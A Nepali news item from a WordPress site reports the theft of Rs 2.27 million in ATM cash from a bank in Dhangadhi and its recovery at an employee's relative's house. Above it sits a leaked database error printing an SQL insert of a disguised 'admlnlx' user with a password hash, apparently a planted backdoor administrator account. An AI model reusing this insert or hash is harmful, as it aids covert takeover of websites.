WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCsy4Z0.rFcIcvvVYyZKZtP1rT7Oqh.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:17:04', '', 'admlnlx', 'admlnlx')
धनगढी, फागुन २-
कैलालीको धनगढीस्थित नेपाल इन्भेष्टमेन्ट बैंकबाट गायव भएको २२ लाख ७० हजार रुपैयाँ बैंककै कर्मचारीको भाउजुको घरमा भेटिएको छ ।रकम चोरीमा संलग्न बैंकका कर्मचारी गोविन्द उपाध्यायलाई प्रहरीले पक्राउ गरेको छ ।
बैंकको एटिएममा राख्नका लागि तयार पारिएको रकम शुक्रबार बैंक भित्रबाटै गायव भएको थियो ।पैसा हराएदेखि नै शंकाको घेरामा रहेका कर्मचारी उपाध्यायसहित बैंकका सुरक्षा गार्डलाई प्रहरीले आइतबार पक्राउ गरी अनुसन्धान सुरु गरेको थियो ।अनुसन्धानका क्रममा बैंकका कर्मचारी उपाध्यायले रकम चोरी गरेको स्वीकार गरे । उनले चोरी गरेको रकम अत्तरिया नगरपालिका वडा नम्बर १० स्थित लीला जोशीलाई राख्न दिएका थिए । भाउजु नाता पर्ने जोशीको घरबाट प्रहरीले रकम बरामद गरेको एसपी अर्जुन चन्दले जानकारी दिए ।
बाँकी रकमबारे अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।पैसा हराएको जानकारी पाएपछि इन्भेष्टमेन्ट बैंकका प्रमुख कार्यकारी अधिकृत ज्योति पाण्डे हेलिकप्टर चार्टर गरी शनिबार धनगढी पुगेका थिए ।